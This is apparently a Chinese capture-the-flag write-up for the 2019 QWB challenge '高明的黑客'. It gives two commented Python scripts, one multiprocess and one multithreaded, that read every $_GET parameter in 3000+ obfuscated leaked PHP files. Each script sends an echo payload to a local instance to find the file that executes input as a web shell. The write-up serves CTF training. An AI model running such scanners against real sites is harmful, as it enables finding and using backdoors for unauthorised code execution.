[强网杯 2019]高明的黑客
提示有源码泄露
下载下来后,发现有3000多个文件,做了大量的混淆
推测其中有能执行的php文件
嫖一个一叶飘零大佬的脚本
大致思想是找出每个文件里 $_GET['...'] 中的参数名,然后把它当作入口去执行,类似于 $_GET['a'] = echo "sky cool"; — 如果回显中出现 sky cool,说明该参数的值被执行了,这个文件就是可用的 shell。
15个进程,花了一个钟头跑出结果
import os
import re
from multiprocessing import Pool

import requests
# Local mirror of the leaked site source; every .php file is read from here.
base_dir = "www/src/"
# The running instance of the same tree; probe requests go here.
base_url = "http://localhost/www/src/"
# One entry per file in the leaked source, plain names such as
# 'Hk3aCSWcQZK.php'; built once and shared by all workers.
file_list = list(os.listdir(base_dir))
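def extracts(f, directory=None):
    """Return the names of every ``$_GET['...']`` parameter read in one PHP file.

    Args:
        f: file name relative to ``directory``.
        directory: directory prefix the name is appended to (same string
            concatenation as before, so keep the trailing slash); defaults to
            the module-level ``base_dir`` so existing callers keep working.

    Returns:
        A list with one entry per occurrence, in file order. Duplicates are
        kept so the caller sees exactly what the file references.

    Raises:
        IOError / OSError if the file cannot be opened.
    """
    if directory is None:
        directory = base_dir
    gets = []
    with open(directory + f, 'r') as handle:
        for line in handle:
            # findall returns every match on the line: one that starts at
            # column 0 (the old ``find(...) > 0`` test skipped it) and a
            # second ``$_GET`` on the same line.  A ``$_GET['`` with no
            # closing quote on the line is ignored instead of slicing
            # garbage up to index -1.
            gets.extend(re.findall(r"\$_GET\['([^']*)'", line))
    return gets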
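def exp(start, end, marker='sky cool', timeout=10):
    """Probe ``file_list[start:end]`` on the running server, one parameter at a time.

    For each file the ``$_GET`` parameter names are pulled from the local copy
    with ``extracts`` and each one is sent the value ``echo "<marker>";``.  A
    response body containing the bare marker means that parameter's value was
    executed: the URL is printed and the remaining parameters of that file are
    skipped.

    Args:
        start, end: index range into the module-level ``file_list``; the
            slice clips ``end`` to the list length, so a trailing chunk no
            longer raises IndexError inside a pool worker (where
            ``apply_async`` would silently swallow it).
        marker: text whose appearance in the response signals execution.
        timeout: per-request timeout in seconds; without one a single hung
            connection blocks this worker for the rest of the run.

    Returns:
        The list of URLs that echoed the marker (empty if none).
    """
    payload = 'echo "%s";' % marker
    found = []
    for filename in file_list[start:end]:
        gets = extracts(filename)
        print("try: %s" % filename)
        for get in gets:
            try:
                # Let requests build the query string so the quotes, space and
                # semicolon are percent-encoded rather than sent raw.
                r = requests.get(base_url + filename,
                                 params={get: payload}, timeout=timeout)
            except requests.RequestException as err:
                # One unreachable file must not end the whole chunk.
                print("error: %s?%s (%s)" % (filename, get, err))
                continue
            # r.text (not r.content) so the check works on Python 2 and 3.
            if marker in r.text:
                print(r.url)
                found.append(r.url)
                break
    # The old version printed "not found" unconditionally, even after a hit.
    if not found:
        print("%s~%s not found!" % (start, end))
    return found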
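def main(processes=15):
    """Scan every file in ``file_list`` with a pool of ``processes`` workers.

    The list is split into contiguous chunks whose size is rounded *up*, so
    the remainder of the integer division is still covered (the old
    ``len(file_list) / 15`` step truncated, and its last chunk ran past the
    end of the list).  Every ``AsyncResult`` is waited on with ``get()`` so an
    exception inside a worker is reported here instead of vanishing inside
    ``apply_async``.

    Args:
        processes: number of worker processes (and therefore chunks).
    """
    total = len(file_list)
    if total == 0:
        print("no files under %s" % base_dir)
        return
    chunk = -(-total // processes)  # ceiling division, same on Python 2 and 3
    pool = Pool(processes=processes)
    try:
        results = [pool.apply_async(exp, (i, min(i + chunk, total)))
                   for i in range(0, total, chunk)]
        pool.close()
        for res in results:
            res.get()  # re-raises whatever the worker raised
        pool.join()
    except Exception as err:
        # The bare "no" of the old version hid the reason; say what failed.
        pool.terminate()
        pool.join()
        print("no: %s" % err)


if __name__ == "__main__":
    main()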
大佬用的多进程,我自己尝试使用多线程,开30个线程跑
# coding:utf-8
import requests
import os
import threading
import time
# Where the leaked source sits on disk; each thread opens its files from here.
base_dir = "www/src/"
# Where the same tree is served; each thread sends its probes here.
base_url = "http://localhost/www/src/"
# Names of all files in the leaked source (e.g. 'RXoiLRYSOKE.php'); the
# threads below each take an index slice of this one shared list.
file_list = list(os.listdir(base_dir))
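class GetShell(threading.Thread):
    """Worker thread that probes one contiguous slice of ``file_list``.

    For every file in ``file_list[begin:end]`` the ``$_GET['...']`` parameter
    names are read from the local copy and each one is sent the value
    ``echo "sky cool";``.  A response containing the bare marker means that
    parameter's value was executed, so the URL is printed and the rest of that
    file's parameters are skipped.
    """

    MARKER = 'sky cool'
    # Seconds per request; without a timeout one hung connection stalls the
    # thread for the rest of the run.
    TIMEOUT = 10

    def __init__(self, begin, end, base_url, base_dir, file_list):
        """Store the slice and locations; nothing is read or sent until run().

        Args:
            begin, end: index range into ``file_list`` (``end`` exclusive).
            base_url: URL prefix of the running copy of the site.
            base_dir: directory prefix of the local copy (keep the trailing
                slash; the file name is appended by string concatenation).
            file_list: file names shared by all threads; only ever read.
        """
        threading.Thread.__init__(self)
        self.begin = begin
        self.end = end
        self.file_list = file_list
        self.base_dir = base_dir
        self.base_url = base_url

    def _extract_gets(self, filename):
        """Return every ``$_GET['name']`` parameter name found in the local file.

        All occurrences are collected, including one at column 0 and several
        on one line (the old ``find(...) > 0`` check missed both).  A
        ``$_GET['`` with no closing quote on the same line is skipped rather
        than sliced up to index -1.
        """
        token = "$_GET['"
        names = []
        with open(self.base_dir + filename, 'r') as handle:
            for line in handle:
                pos = line.find(token)
                while pos != -1:
                    name_start = pos + len(token)
                    name_end = line.find("'", name_start)
                    if name_end == -1:
                        break
                    names.append(line[name_start:name_end])
                    pos = line.find(token, name_end)
        return names

    def _probe(self, filename, get):
        """Send one probe; return the request URL on a hit, else None."""
        try:
            # requests builds the query string, so the quotes, space and
            # semicolon are percent-encoded rather than sent raw.
            r = requests.get(self.base_url + filename,
                             params={get: 'echo "%s";' % self.MARKER},
                             timeout=self.TIMEOUT)
        except requests.RequestException as err:
            # One unreachable file must not end the whole slice.
            print("error: %s?%s (%s)" % (filename, get, err))
            return None
        # r.text (not r.content) so the check works on Python 2 and 3.
        return r.url if self.MARKER in r.text else None

    def run(self):
        """Scan the slice; slicing clips ``end`` so a short tail cannot IndexError."""
        found = []
        for filename in self.file_list[self.begin:self.end]:
            print("try: %s" % filename)
            for get in self._extract_gets(filename):
                hit = self._probe(filename, get)
                if hit is not None:
                    print(hit)
                    found.append(hit)
                    break
        # The old version printed "not found" unconditionally, even after a hit.
        if not found:
            print("%s~%s not found!" % (self.begin, self.end))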
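thread_count = 30
# Round the slice size *up*: ``len(file_list) / thread_count`` truncates on
# Python 2 (and is a float on Python 3), and with truncation the last
# ``len(file_list) % thread_count`` files were never handed to any thread.
# ``max(1, ...)`` keeps the range step valid when the list is empty.
slice_size = max(1, -(-len(file_list) // thread_count))
threads = [
    GetShell(begin, min(begin + slice_size, len(file_list)),
             base_url, base_dir, file_list)
    for begin in range(0, len(file_list), slice_size)
]
for t in threads:
    t.start()
for t in threads:
    t.join()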
花了一个半钟头
执行一下
获取flag
参考
https://skysec.top/2019/05/25/2019-强网杯online-Web-Writeup/#高明的黑客